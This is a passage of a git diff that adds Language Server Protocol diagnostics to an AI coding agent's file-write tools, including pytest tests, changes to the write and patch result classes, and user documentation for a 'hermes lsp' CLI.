+    reader = await _stream_from_bytes(flood)
+    with pytest.raises(LSPProtocolError) as exc:
+        await read_message(reader)
+    assert "8 KiB" in str(exc.value)
+
+
+# ---------------------------------------------------------------------------
+# envelope helpers
+# ---------------------------------------------------------------------------
+
+
+def test_make_request_includes_id_and_method():
+    msg = make_request(7, "ping", {"v": 1})
+    assert msg == {"jsonrpc": "2.0", "id": 7, "method": "ping", "params": {"v": 1}}
+
+
+def test_make_request_omits_params_when_none():
+    msg = make_request(7, "ping", None)
+    assert "params" not in msg
+
+
+def test_make_notification_omits_id():
+    msg = make_notification("log", {"line": "hi"})
+    assert "id" not in msg
+    assert msg["method"] == "log"
+
+
+def test_make_response_carries_result():
+    msg = make_response(7, {"ok": True})
+    assert msg["id"] == 7 and msg["result"] == {"ok": True}
+
+
+def test_make_error_response_shape():
+    msg = make_error_response(7, ERROR_CONTENT_MODIFIED, "stale", {"hint": "retry"})
+    assert msg["error"]["code"] == ERROR_CONTENT_MODIFIED
+    assert msg["error"]["message"] == "stale"
+    assert msg["error"]["data"] == {"hint": "retry"}
+
+
+# ---------------------------------------------------------------------------
+# classify_message
+# ---------------------------------------------------------------------------
+
+
+def test_classify_message_request():
+    msg = {"jsonrpc": "2.0", "id": 1, "method": "x"}
+    assert classify_message(msg) == ("request", 1)
+
+
+def test_classify_message_response():
+    msg = {"jsonrpc": "2.0", "id": 1, "result": None}
+    assert classify_message(msg) == ("response", 1)
+
+
+def test_classify_message_notification():
+    msg = {"jsonrpc": "2.0", "method": "log"}
+    assert classify_message(msg) == ("notification", "log")
+
+
+def test_classify_message_invalid():
+    assert classify_message({"id": 1})[0] == "invalid"
+    assert classify_message({"jsonrpc": "1.0", "method": "x"})[0] == "invalid"
+
+
+# ---------------------------------------------------------------------------
+# LSPRequestError
+# ---------------------------------------------------------------------------
+
+
+def test_lsp_request_error_carries_code_and_data():
+    e = LSPRequestError(ERROR_METHOD_NOT_FOUND, "no", {"x": 1})
+    assert e.code == ERROR_METHOD_NOT_FOUND
+    assert e.message == "no"
+    assert e.data == {"x": 1}
diff --git a/tests/agent/lsp/test_reporter.py b/tests/agent/lsp/test_reporter.py
new file mode 100644
index 00000000000..e4b1cbd39f4
--- /dev/null
+++ b/tests/agent/lsp/test_reporter.py
@@ -0,0 +1,94 @@
+"""Tests for the diagnostic reporter (formatting layer)."""
+from __future__ import annotations
+
+from agent.lsp.reporter import (
+    DEFAULT_SEVERITIES,
+    MAX_PER_FILE,
+    format_diagnostic,
+    report_for_file,
+    truncate,
+)
+
+
+def _diag(line=0, col=0, sev=1, code="E001", source="ls", msg="oops"):
+    return {
+        "range": {
+            "start": {"line": line, "character": col},
+            "end": {"line": line, "character": col + 1},
+        },
+        "severity": sev,
+        "code": code,
+        "source": source,
+        "message": msg,
+    }
+
+
+def test_format_diagnostic_uses_one_indexed_position():
+    line = format_diagnostic(_diag(line=4, col=2))
+    assert "[5:3]" in line  # +1 on both
+
+
+def test_format_diagnostic_includes_severity_label():
+    assert format_diagnostic(_diag(sev=1)).startswith("ERROR")
+    assert format_diagnostic(_diag(sev=2)).startswith("WARN")
+    assert format_diagnostic(_diag(sev=3)).startswith("INFO")
+    assert format_diagnostic(_diag(sev=4)).startswith("HINT")
+
+
+def test_format_diagnostic_includes_code_and_source():
+    line = format_diagnostic(_diag(code="X42", source="src"))
+    assert "[X42]" in line
+    assert "(src)" in line
+
+
+def test_format_diagnostic_omits_missing_optional_fields():
+    line = format_diagnostic(
+        {
+            "range": {
+                "start": {"line": 0, "character": 0},
+                "end": {"line": 0, "character": 0},
+            },
+            "severity": 1,
+            "message": "bare",
+        }
+    )
+    assert "[" not in line.split("]", 1)[1]  # no extra brackets after the position
+    assert "(" not in line
+
+
+def test_report_for_file_returns_empty_when_only_warnings():
+    """Default severity filter is ERROR-only."""
+    report = report_for_file("/x.py", [_diag(sev=2)])
+    assert report == ""
+
+
+def test_report_for_file_emits_block_with_errors():
+    diag = _diag(msg="real error")
+    report = report_for_file("/x.py", [diag])
+    assert "<diagnostics file=\"/x.py\">" in report
+    assert "real error" in report
+    assert "</diagnostics>" in report
+
+
+def test_report_for_file_caps_at_max_per_file():
+    diags = [_diag(line=i) for i in range(MAX_PER_FILE + 5)]
+    report = report_for_file("/x.py", diags)
+    assert "and 5 more" in report
+
+
+def test_report_for_file_respects_custom_severities():
+    diag = _diag(sev=2, msg="warn")
+    report = report_for_file("/x.py", [diag], severities=frozenset({1, 2}))
+    assert "warn" in report
+
+
+def test_truncate_below_limit_unchanged():
+    s = "abc" * 100
+    assert truncate(s, limit=4000) == s
+
+
+def test_truncate_above_limit_appends_marker():
+    s = "x" * 10000
+    out = truncate(s, limit=200)
+    assert out.endswith("[truncated]")
+    assert len(out) <= 200
diff --git a/tests/agent/lsp/test_service.py b/tests/agent/lsp/test_service.py
new file mode 100644
index 00000000000..6eed8f7fd99
--- /dev/null
+++ b/tests/agent/lsp/test_service.py
@@ -0,0 +1,149 @@
+"""Tests for the synchronous LSPService wrapper.
+
+Drives the service through ``snapshot_baseline`` →
+``get_diagnostics_sync`` against the mock LSP server, exercising the
+delta filter that ``tools/file_operations._check_lint_delta`` relies
+on.
+"""
+from __future__ import annotations
+
+import os
+import sys
+from pathlib import Path
+
+import pytest
+
+from agent.lsp.manager import LSPService
+from agent.lsp.servers import (
+    SERVERS,
+    ServerContext,
+    ServerDef,
+    SpawnSpec,
+    find_server_for_file,
+)
+
+
+MOCK_SERVER = str(Path(__file__).parent / "_mock_lsp_server.py")
+
+
+def _install_mock_server(monkeypatch, script: str = "errors", server_id: str = "pyright"):
+    """Replace one registered server with a wrapper that spawns the mock.
+
+    We reuse ``pyright`` so .py files route to it.  This keeps the
+    test free of any LSP toolchain dependency.
+    """
+    target_index = next(i for i, s in enumerate(SERVERS) if s.server_id == server_id)
+    original = SERVERS[target_index]
+
+    def _spawn(root: str, ctx: ServerContext) -> SpawnSpec:
+        env = {"MOCK_LSP_SCRIPT": script}
+        return SpawnSpec(
+            command=[sys.executable, MOCK_SERVER],
+            workspace_root=root,
+            cwd=root,
+            env=env,
+            initialization_options={},
+        )
+
+    replacement = ServerDef(
+        server_id=server_id,
+        extensions=original.extensions,
+        resolve_root=lambda fp, ws: ws,  # always use workspace root
+        build_spawn=_spawn,
+        seed_first_push=False,
+        description="mock " + server_id,
+    )
+    # Patch the SERVERS list element directly + restore on teardown.
+    SERVERS[target_index] = replacement
+
+    yield
+
+    SERVERS[target_index] = original
+
+
+@pytest.fixture
+def mock_pyright(monkeypatch, tmp_path):
+    """Install the mock as ``pyright`` and create a fake git workspace."""
+    repo = tmp_path / "repo"
+    repo.mkdir()
+    (repo / ".git").mkdir()
+    (repo / "pyproject.toml").write_text("")  # so pyright's root resolver finds it
+    monkeypatch.chdir(str(repo))
+    gen = _install_mock_server(monkeypatch, "errors", "pyright")
+    next(gen)
+    yield repo
+    try:
+        next(gen)
+    except StopIteration:
+        pass
+
+
+def test_service_returns_empty_when_disabled(tmp_path):
+    svc = LSPService(
+        enabled=False,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="auto",
+    )
+    assert not svc.is_active()
+    f = tmp_path / "x.py"
+    f.write_text("")
+    assert svc.get_diagnostics_sync(str(f)) == []
+    svc.shutdown()
+
+
+def test_service_skips_files_outside_workspace(tmp_path):
+    """Files outside any git worktree must not trigger LSP."""
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    f = tmp_path / "x.py"
+    f.write_text("")
+    # No .git anywhere — service should report not enabled for this file.
+    assert not svc.enabled_for(str(f))
+    svc.shutdown()
+
+
+def test_service_e2e_delta_filter(mock_pyright):
+    """End-to-end: snapshot baseline → wait → delta returned."""
+    repo = mock_pyright
+    f = repo / "x.py"
+    f.write_text("print('hi')\n")
+
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=3.0,
+        install_strategy="manual",
+    )
+    try:
+        assert svc.enabled_for(str(f))
+        # Baseline first — server pushes 1 error.
+        svc.snapshot_baseline(str(f))
+        # Re-poll: same error is in baseline, so delta is empty.
+        new_diags = svc.get_diagnostics_sync(str(f))
+        assert new_diags == []
+    finally:
+        svc.shutdown()
+
+
+def test_service_status_includes_clients(mock_pyright):
+    repo = mock_pyright
+    f = repo / "x.py"
+    f.write_text("")
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=3.0,
+        install_strategy="manual",
+    )
+    try:
+        svc.get_diagnostics_sync(str(f))
+        info = svc.get_status()
+        assert info["enabled"] is True
+        assert any(c["server_id"] == "pyright" for c in info["clients"])
+    finally:
+        svc.shutdown()
diff --git a/tests/agent/lsp/test_workspace.py b/tests/agent/lsp/test_workspace.py
new file mode 100644
index 00000000000..2373418aa73
--- /dev/null
+++ b/tests/agent/lsp/test_workspace.py
@@ -0,0 +1,139 @@
+"""Tests for workspace + project-root resolution."""
+from __future__ import annotations
+
+import os
+from pathlib import Path
+
+import pytest
+
+from agent.lsp.workspace import (
+    clear_cache,
+    find_git_worktree,
+    is_inside_workspace,
+    nearest_root,
+    normalize_path,
+    resolve_workspace_for_file,
+)
+
+
+@pytest.fixture(autouse=True)
+def _clear():
+    clear_cache()
+    yield
+    clear_cache()
+
+
+def test_find_git_worktree_returns_none_outside_repo(tmp_path: Path):
+    sub = tmp_path / "sub"
+    sub.mkdir()
+    assert find_git_worktree(str(sub)) is None
+
+
+def test_find_git_worktree_finds_dotgit(tmp_path: Path):
+    repo = tmp_path / "repo"
+    repo.mkdir()
+    (repo / ".git").mkdir()
+    sub = repo / "src" / "deep"
+    sub.mkdir(parents=True)
+    assert find_git_worktree(str(sub)) == str(repo)
+
+
+def test_find_git_worktree_handles_dotgit_file(tmp_path: Path):
+    """``.git`` can also be a file (gitfile pointing into a worktree)."""
+    repo = tmp_path / "repo"
+    repo.mkdir()
+    (repo / ".git").write_text("gitdir: /elsewhere\n")
+    assert find_git_worktree(str(repo)) == str(repo)
+
+
+def test_is_inside_workspace_true_for_subpath(tmp_path: Path):
+    root = tmp_path / "p"
+    root.mkdir()
+    sub = root / "x" / "y.py"
+    sub.parent.mkdir(parents=True)
+    sub.write_text("")
+    assert is_inside_workspace(str(sub), str(root))
+
+
+def test_is_inside_workspace_false_for_unrelated(tmp_path: Path):
+    a = tmp_path / "a"
+    b = tmp_path / "b"
+    a.mkdir()
+    b.mkdir()
+    f = b / "x.py"
+    f.write_text("")
+    assert not is_inside_workspace(str(f), str(a))
+
+
+def test_nearest_root_finds_first_marker(tmp_path: Path):
+    root = tmp_path / "p"
+    deep = root / "src" / "pkg"
+    deep.mkdir(parents=True)
+    (root / "pyproject.toml").write_text("")
+    found = nearest_root(str(deep / "mod.py"), ["pyproject.toml"])
+    assert found == str(root)
+
+
+def test_nearest_root_excludes_take_priority(tmp_path: Path):
+    """If an exclude marker matches first, return None."""
+    root = tmp_path / "p"
+    sub = root / "deno-app"
+    sub.mkdir(parents=True)
+    (sub / "deno.json").write_text("{}")
+    (root / "package.json").write_text("{}")  # would match if not for exclude
+    found = nearest_root(
+        str(sub / "main.ts"),
+        ["package.json"],
+        excludes=["deno.json"],
+    )
+    assert found is None
+
+
+def test_nearest_root_returns_none_when_no_marker(tmp_path: Path):
+    f = tmp_path / "x.py"
+    f.write_text("")
+    assert nearest_root(str(f), ["pyproject.toml"]) is None
+
+
+def test_resolve_workspace_for_file_uses_cwd_first(tmp_path: Path, monkeypatch):
+    repo = tmp_path / "repo"
+    (repo / ".git").mkdir(parents=True)
+    file_path = repo / "x.py"
+    file_path.write_text("")
+    # cwd is inside the repo
+    monkeypatch.chdir(str(repo))
+    root, gated = resolve_workspace_for_file(str(file_path))
+    assert root == str(repo)
+    assert gated is True
+
+
+def test_resolve_workspace_for_file_no_repo_returns_none(tmp_path: Path, monkeypatch):
+    monkeypatch.chdir(str(tmp_path))
+    f = tmp_path / "x.py"
+    f.write_text("")
+    root, gated = resolve_workspace_for_file(str(f))
+    assert root is None
+    assert gated is False
+
+
+def test_resolve_workspace_falls_back_to_file_location(tmp_path: Path, monkeypatch):
+    """When cwd isn't a git repo but the file is inside one, we still
+    discover the workspace from the file's path."""
+    not_a_repo = tmp_path / "loose"
+    not_a_repo.mkdir()
+    monkeypatch.chdir(str(not_a_repo))
+
+    repo = tmp_path / "actual-repo"
+    (repo / ".git").mkdir(parents=True)
+    f = repo / "x.py"
+    f.write_text("")
+
+    root, gated = resolve_workspace_for_file(str(f))
+    assert root == str(repo)
+    assert gated is True
+
+
+def test_normalize_path_expands_tilde(monkeypatch):
+    monkeypatch.setenv("HOME", "/home/user")
+    p = normalize_path("~/x.py")
+    assert p == os.path.abspath("/home/user/x.py")
diff --git a/tools/file_operations.py b/tools/file_operations.py
index 91c5abae343..f8b194b215c 100644
--- a/tools/file_operations.py
+++ b/tools/file_operations.py
@@ -120,6 +120,13 @@ class WriteResult:
     bytes_written: int = 0
     dirs_created: bool = False
     lint: Optional[Dict[str, Any]] = None
+    # Semantic diagnostics from the LSP layer, when applicable.  Kept in
+    # its own field (not folded into ``lint``) so the model and any
+    # downstream parsers can read syntax errors and semantic errors as
+    # separate signals.  ``None`` when LSP is disabled, when the file
+    # isn't in a git workspace, or when no diagnostics were introduced
+    # by this edit.
+    lsp_diagnostics: Optional[str] = None
     error: Optional[str] = None
     warning: Optional[str] = None
 
@@ -136,6 +143,8 @@ class PatchResult:
     files_created: List[str] = field(default_factory=list)
     files_deleted: List[str] = field(default_factory=list)
     lint: Optional[Dict[str, Any]] = None
+    # See :class:`WriteResult.lsp_diagnostics`.
+    lsp_diagnostics: Optional[str] = None
     error: Optional[str] = None
     
     def to_dict(self) -> dict:
@@ -150,6 +159,8 @@ class PatchResult:
             result["files_deleted"] = self.files_deleted
         if self.lint:
             result["lint"] = self.lint
+        if self.lsp_diagnostics:
+            result["lsp_diagnostics"] = self.lsp_diagnostics
         if self.error:
             result["error"] = self.error
         return result
@@ -867,6 +878,13 @@ class ShellFileOperations(FileOperations):
             if read_result.exit_code == 0 and read_result.stdout:
                 pre_content = read_result.stdout
 
+        # Snapshot LSP diagnostics for this file (best-effort) so the
+        # post-write LSP layer can return only diagnostics introduced
+        # by this specific edit.  Mirrors claude-code's
+        # ``beforeFileEdited`` pattern but wired to the local LSP
+        # rather than an external IDE.
+        self._snapshot_lsp_baseline(path)
+
         # Create parent directories
         parent = os.path.dirname(path)
         dirs_created = False
@@ -897,10 +915,21 @@ class ShellFileOperations(FileOperations):
         # Post-write lint with delta refinement.
         lint_result = self._check_lint_delta(path, pre_content=pre_content, post_content=content)
 
+        # Semantic diagnostics from the LSP layer — separate channel.
+        # Only fired when the syntax tier reported clean (no point asking
+        # an LSP for a file that won't even parse).  Best-effort:
+        # ``""`` is returned for any failure path.
+        lsp_diagnostics: Optional[str] = None
+        if lint_result.success or lint_result.skipped:
+            block = self._maybe_lsp_diagnostics(path)
+            if block:
+                lsp_diagnostics = block
+
         return WriteResult(
             bytes_written=bytes_written,
             dirs_created=dirs_created,
             lint=lint_result.to_dict() if lint_result else None,
+            lsp_diagnostics=lsp_diagnostics,
         )
     
     # =========================================================================
@@ -996,7 +1025,14 @@ class ShellFileOperations(FileOperations):
             success=True,
             diff=diff,
             files_modified=[path],
-            lint=lint_result.to_dict() if lint_result else None
+            lint=lint_result.to_dict() if lint_result else None,
+            # Propagate the LSP diagnostics already captured by the
+            # internal ``write_file`` call.  Its baseline was the
+            # pre-patch content (taken at the start of write_file via
+            # ``_snapshot_lsp_baseline``) so the delta is correct for
+            # the patch as a whole.  Keep the field separate from the
+            # syntax-check ``lint`` so the agent can read both signals.
+            lsp_diagnostics=write_result.lsp_diagnostics,
         )
     
     def patch_v4a(self, patch_content: str) -> PatchResult:
@@ -1089,21 +1125,25 @@ class ShellFileOperations(FileOperations):
     def _check_lint_delta(self, path: str, pre_content: Optional[str],
                           post_content: Optional[str] = None) -> LintResult:
         """
-        Run post-write lint with pre-write baseline comparison.
+        Run post-write syntax lint with pre-write baseline comparison.
 
-        Strategy (post-first, pre-lazy):
-        1. Lint the post-write state.  If clean → return clean immediately.
-           This is the hot path and matches _check_lint() in cost.
-        2. If post-lint found errors AND we have pre-write content, lint
-           that too.  If the pre-write file was already broken, return only
-           the *new* errors introduced by this edit — errors that existed
-           before aren't the agent's problem to chase right now.
-        3. If pre_content is None (new file or unavailable), skip the delta
-           step and return all post-write errors.
+        Two-tier strategy:
 
-        This mirrors Cline's and OpenCode's post-edit LSP pattern: surface
-        only the errors this specific edit introduced, so the agent doesn't
-        get distracted by pre-existing problems.
+        1. **Syntax check** (in-process or shell-based, microseconds).
+           Catches the bug class that motivated this layer: corrupt
+           writes, mashed quotes, truncated output.  Hot path.
+
+        2. **Delta refinement against pre-write content** when the
+           syntax tier reports errors.  Filter out errors that already
+           existed pre-edit so the agent isn't distracted by inherited
+           state.
+
+        Semantic diagnostics from the LSP layer are fetched separately
+        via :meth:`_maybe_lsp_diagnostics` and surfaced in the
+        ``lsp_diagnostics`` field on :class:`WriteResult` /
+        :class:`PatchResult`.  Keeping the two channels separate lets
+        the agent (and any downstream parsers) read syntax errors and
+        semantic errors as independent signals.
 
         Args:
             path: File path (for linter selection).
@@ -1122,12 +1162,12 @@ class ShellFileOperations(FileOperations):
         """
         post = self._check_lint(path, content=post_content)
 
-        # Hot path: clean post-write, no pre-lint needed.
+        # Hot path: clean post-write syntactically.
         if post.success or post.skipped:
             return post
 
-        # Post-write has errors.  If we have pre-content, run the delta
-        # refinement to filter out pre-existing errors.
+        # Post-write has syntax errors.  If we have pre-content, run the
+        # delta refinement to filter out pre-existing errors.
         if pre_content is None:
             return post
 
@@ -1166,6 +1206,91 @@ class ShellFileOperations(FileOperations):
                 "(pre-existing errors filtered out):\n" + "\n".join(post_lines)
             )
         )
+
+    def _lsp_local_only(self) -> bool:
+        """Return True iff this FileOperations is wired to a local backend.
+
+        LSP servers run on the host process — they need access to the
+        files they're linting.  Remote/sandboxed backends (Docker,
+        Modal, SSH, Daytona) keep files inside the sandbox where the
+        host-side LSP server can't reach them, so we skip the LSP
+        path for those entirely.
+        """
+        env = getattr(self, "env", None)
+        if env is None:
+            # Defensive: some tests construct ShellFileOperations via
+            # ``__new__`` without going through ``__init__``, so
+            # ``self.env`` may be missing.  No env = no LSP path.
+            return False
+        try:
+            from tools.environments.local import LocalEnvironment
+        except Exception:  # noqa: BLE001
+            return False
+        return isinstance(env, LocalEnvironment)
+
+    def _snapshot_lsp_baseline(self, path: str) -> None:
+        """Capture pre-edit LSP diagnostics so the post-write delta is correct.
+
+        Best-effort.  Silent on every failure path — LSP is an
+        enrichment layer and must never break a write.
+
+        Skipped entirely on non-local backends (Docker, Modal, SSH,
+        etc.) — the server can't see files inside the sandbox.
+        """
+        if not self._lsp_local_only():
+            return
+        try:
+            from agent.lsp import get_service
+            svc = get_service()
+        except Exception:  # noqa: BLE001
+            return
+        if svc is None:
+            return
+        try:
+            svc.snapshot_baseline(path)
+        except Exception:  # noqa: BLE001
+            pass
+
+    def _maybe_lsp_diagnostics(self, path: str) -> str:
+        """Best-effort LSP semantic diagnostics for ``path``.
+
+        Returns a formatted ``<diagnostics>`` block, or empty string
+        when LSP is unavailable / disabled / produced no errors.
+
+        Wraps everything in a try/except so a misbehaving LSP server
+        can't break a write.  This intentionally swallows all errors
+        — the calling tier already returned a clean syntax result, so
+        ``""`` here just means "no extra info to add".
+
+        Skipped entirely on non-local backends (Docker, Modal, SSH,
+        etc.) — same reasoning as ``_snapshot_lsp_baseline``.
+        """
+        if not self._lsp_local_only():
+            return ""
+        try:
+            from agent.lsp import get_service
+        except Exception:  # noqa: BLE001
+            return ""
+        try:
+            svc = get_service()
+        except Exception:  # noqa: BLE001
+            return ""
+        if svc is None or not svc.enabled_for(path):
+            return ""
+        try:
+            diagnostics = svc.get_diagnostics_sync(path, delta=True)
+        except Exception:  # noqa: BLE001
+            return ""
+        if not diagnostics:
+            return ""
+        try:
+            from agent.lsp.reporter import report_for_file, truncate
+            block = report_for_file(path, diagnostics)
+            if not block:
+                return ""
+            return truncate("LSP diagnostics introduced by this edit:\n" + block)
+        except Exception:  # noqa: BLE001
+            return ""
     
     # =========================================================================
     # SEARCH Implementation
diff --git a/website/docs/reference/cli-commands.md b/website/docs/reference/cli-commands.md
index 1079bdf3ca2..4ce8a331a94 100644
--- a/website/docs/reference/cli-commands.md
+++ b/website/docs/reference/cli-commands.md
@@ -40,6 +40,7 @@ hermes [global-options] <command> [subcommand/options]
 | `hermes model` | Interactively choose the default provider and model. |
 | `hermes fallback` | Manage fallback providers tried when the primary model errors. |
 | `hermes gateway` | Run or manage the messaging gateway service. |
+| `hermes lsp` | Manage Language Server Protocol integration (semantic diagnostics for write_file/patch). |
 | `hermes setup` | Interactive setup wizard for all or part of the configuration. |
 | `hermes whatsapp` | Configure and pair the WhatsApp bridge. |
 | `hermes slack` | Slack helpers (currently: generate the app manifest with every command as a native slash). |
@@ -223,6 +224,33 @@ Options:
 Use `hermes gateway run` instead of `hermes gateway start` — WSL's systemd support is unreliable. Wrap it in tmux for persistence: `tmux new -s hermes 'hermes gateway run'`. See [WSL FAQ](/docs/reference/faq#wsl-gateway-keeps-disconnecting-or-hermes-gateway-start-fails) for details.
 :::
 
+## `hermes lsp`
+
+```bash
+hermes lsp <subcommand>
+```
+
+Manage the Language Server Protocol integration. LSP runs real
+language servers (pyright, gopls, rust-analyzer, …) in the
+background and feeds their diagnostics into the post-write check
+used by `write_file` and `patch`. Gated on git workspace detection
+— LSP only runs when the cwd or edited file is inside a git
+worktree.
+
+Subcommands:
+
+| Subcommand | Description |
+|------------|-------------|
+| `status` | Show service state, configured servers, install status. |
+| `list` | Print the registry of supported servers. Pass `--installed-only` to skip missing ones. |
+| `install <id>` | Eagerly install one server's binary. |
+| `install-all` | Install every server with a known auto-install recipe. |
+| `restart` | Tear down running clients so the next edit re-spawns. |
+| `which <id>` | Print the resolved binary path for one server. |
+
+See [LSP — Semantic Diagnostics](/docs/user-guide/features/lsp) for
+the full guide, supported languages, and configuration knobs.
+
 ## `hermes setup`
 
 ```bash
diff --git a/website/docs/user-guide/features/lsp.md b/website/docs/user-guide/features/lsp.md
new file mode 100644
index 00000000000..ef0f403d202
--- /dev/null
+++ b/website/docs/user-guide/features/lsp.md
@@ -0,0 +1,228 @@
+---
+sidebar_position: 16
+title: "LSP — Semantic Diagnostics"
+description: "Real language servers (pyright, gopls, rust-analyzer, …) wired into the post-write lint check used by write_file and patch."
+---
+
+# Language Server Protocol (LSP)
+
+Hermes runs full language servers — pyright, gopls, rust-analyzer,
+typescript-language-server, clangd, and ~20 more — as background
+subprocesses and feeds their semantic diagnostics into the post-write
+lint check used by `write_file` and `patch`. When the agent edits a
+file, it sees exactly the errors that edit introduced — not just
+syntax errors, but **type errors, undefined names, missing imports,
+and project-wide semantic issues** the language server detects.
+
+This is the same architecture top-tier coding agents use. Hermes
+ships it self-contained: no editor host required, no plugins to
+install, no separate daemon to manage.
+
+## When LSP runs
+
+LSP is gated on **git workspace detection**. When the agent's working
+directory (or the file being edited) is inside a git worktree, LSP
+runs against that workspace. When neither is in a git repo, LSP
+stays dormant — useful for messaging gateways where the cwd is the
+user's home directory and there's no project to diagnose.
+
+The check is layered: in-process syntax check first (microseconds),
+then LSP diagnostics second when syntax is clean. A flaky or missing
+language server can never break a write — every LSP failure path
+falls back silently to the syntax-only result.
+
+Concretely, on every successful `write_file` or `patch`:
+
+1. Hermes captures a baseline of current diagnostics for the file.
+2. Performs the write.
+3. Re-queries the language server, filters out diagnostics that were
+   already in the baseline, and surfaces only the new ones.
+
+The agent sees output like:
+
+```
+{
+  "bytes_written": 42,
+  "dirs_created": false,
+  "lint": {"status": "ok", "output": ""},
+  "lsp_diagnostics": "LSP diagnostics introduced by this edit:\n<diagnostics file=\"/path/to/foo.py\">\nERROR [42:5] Cannot find name 'foo' [reportUndefinedVariable] (Pyright)\nERROR [50:1] Argument of type \"str\" is not assignable to \"int\" [reportArgumentType] (Pyright)\n</diagnostics>"
+}
+```
+
+The `lint` field carries the syntax-check result (microsecond
+in-process parse via `ast.parse`, `json.loads`, etc.); the
+`lsp_diagnostics` field carries the semantic diagnostics from the
+real language server. Two channels, independent signals — the
+agent sees a syntax-clean file with semantic problems as
+``lint: ok`` plus a populated ``lsp_diagnostics``.
+
+## Supported languages
+
+| Language | Server | Auto-install |
+|----------|--------|--------------|
+| Python | `pyright-langserver` | npm |
+| TypeScript / JavaScript / JSX / TSX | `typescript-language-server` | npm |
+| Vue | `@vue/language-server` | npm |
+| Svelte | `svelte-language-server` | npm |
+| Astro | `@astrojs/language-server` | npm |
+| Go | `gopls` | `go install` |
+| Rust | `rust-analyzer` | manual (rustup) |
+| C / C++ | `clangd` | manual (LLVM) |
+| Bash / Zsh | `bash-language-server` | npm |
+| YAML | `yaml-language-server` | npm |
+| Lua | `lua-language-server` | manual (GitHub releases) |
+| PHP | `intelephense` | npm |
+| OCaml | `ocaml-lsp` | manual (opam) |
+| Dockerfile | `dockerfile-language-server-nodejs` | npm |
+| Terraform | `terraform-ls` | manual |
+| Dart | `dart language-server` | manual (dart sdk) |
+| Haskell | `haskell-language-server` | manual (ghcup) |
+| Julia | `julia` + LanguageServer.jl | manual |
+| Clojure | `clojure-lsp` | manual |
+| Nix | `nixd` | manual |
+| Zig | `zls` | manual |
+| Gleam | `gleam lsp` | manual (gleam install) |
+| Elixir | `elixir-ls` | manual |
+| Prisma | `prisma language-server` | manual |
+| Kotlin | `kotlin-language-server` | manual |
+| Java | `jdtls` | manual |
+
+For "manual" entries, install the server through whatever toolchain
+manager makes sense for that language (rustup, ghcup, opam, brew,
+…). Hermes auto-detects the binary on PATH or in
+`<HERMES_HOME>/lsp/bin/`.
+
+## CLI
+
+```
+hermes lsp status          # service state + per-server install status
+hermes lsp list            # registry, optionally --installed-only
+hermes lsp install <id>    # eagerly install one server
+hermes lsp install-all     # try every server with a known recipe
+hermes lsp restart         # tear down running clients
+hermes lsp which <id>      # print resolved binary path
+```
+
+`hermes lsp status` is the best starting point — it shows which
+languages will get semantic diagnostics today and which need a
+binary installed.
+
+## Configuration
+
+The defaults work for typical setups; nothing to set if the binaries
+are on PATH.
+
+```yaml
+# config.yaml
+lsp:
+  # Master toggle. Disabling skips the entire subsystem — no servers
+  # spawn, no background event loop runs.
+  enabled: true
+
+  # How long to wait for diagnostics after each write.
+  wait_mode: document      # "document" or "full"
+  wait_timeout: 5.0
+
+  # How to handle missing server binaries.
+  #   auto    — install via npm/pip/go install into <HERMES_HOME>/lsp/bin
+  #   manual  — only use binaries already on PATH
+  install_strategy: auto
+
+  # Per-server overrides (all optional).
+  servers:
+    pyright:
+      disabled: false
+      command: ["/abs/path/to/pyright-langserver", "--stdio"]
+      env: { PYRIGHT_LOG_LEVEL: "info" }
+      initialization_options:
+        python:
+          analysis:
+            typeCheckingMode: "strict"
+    typescript:
+      disabled: true       # skip TS even when its extensions match
+```
+
+### Per-server keys
+
+* `disabled: true` — skip this server entirely even when its
+  extensions match a file.
+* `command: [bin, ...args]` — pin a custom binary path. Bypasses
+  auto-install.
+* `env: {KEY: value}` — extra env vars passed to the spawned process.
+* `initialization_options: {...}` — merged into the LSP
+  `initializationOptions` payload sent in the `initialize`
+  handshake. Server-specific; consult the language server's docs.
+
+## Installation locations
+
+When `install_strategy: auto`, Hermes installs binaries into
+`<HERMES_HOME>/lsp/bin/`. NPM packages land in
+`<HERMES_HOME>/lsp/node_modules/` with bin symlinks one level up.
+Go binaries come from `go install` with `GOBIN` pointed at the
+staging dir.
+
+Nothing is ever installed to `/usr/local/`, `~/.local/`, or any other
+shared location — the staging dir is fully Hermes-owned and is
+removed when you reset the profile.
+
+## Performance characteristics
+
+LSP servers are **lazy-spawned** on first use. Editing a Python file
+in a project that's never seen `.py` traffic spawns pyright; the
+spawn takes 1-3 seconds for most servers (rust-analyzer can take 10+
+on a cold project). Subsequent edits in the same workspace re-use
+the running server.
+
+The LSP layer adds a few milliseconds to clean writes when no
+diagnostics are emitted. When diagnostics are emitted, the wait
+budget is `wait_timeout` seconds — typically the server responds in
+tens of milliseconds for pyright/tsserver and a few seconds for
+rust-analyzer mid-indexing.
+
+Servers are kept alive for the life of the Hermes process. There's
+no idle-timeout reaper — the cost of restarting the server's index
+on every write would be far higher than holding the daemon.
+
+## Disabling
+
+Set `lsp.enabled: false` in `config.yaml` to disable the entire
+subsystem. The post-write check falls back to the in-process syntax
+check (`ast.parse` for Python, `json.loads` for JSON, etc.) which
+ships unchanged from earlier versions.
+
+To disable a single language without disabling the whole layer:
+
+```yaml
+lsp:
+  servers:
+    rust-analyzer:
+      disabled: true
+```
+
+## Troubleshooting
+
+**`hermes lsp status` shows a server as "missing"**
+
+The binary isn't on PATH and isn't in `<HERMES_HOME>/lsp/bin/`. Run
+`hermes lsp install <server_id>` to attempt an auto-install, or
+install the binary manually through the language's normal toolchain.
+
+**Server starts but never returns diagnostics**
+
+Check `~/.hermes/logs/agent.log` for `[agent.lsp.client]` entries —
+both stderr from the language server and protocol errors land
+there. Some servers (rust-analyzer especially) need to finish a
+project-wide index before they emit per-file diagnostics; the first
+edit after server start may complete with no diagnostics, with
+subsequent edits picking them up.
+
+**Server crashed**
+
+A crashed server is added to the broken-set and won't be retried for
+the rest of the session. Run `hermes lsp restart` to clear the set;
+the next edit re-spawns.
+
+**Editing a file outside any git repo**
+
+By design, LSP only runs inside git worktrees. Run `git init` in the
+project, or accept the in-process syntax-only fallback.
diff --git a/website/sidebars.ts b/website/sidebars.ts
index c96db714760..67a256bcc09 100644
--- a/website/sidebars.ts
+++ b/website/sidebars.ts
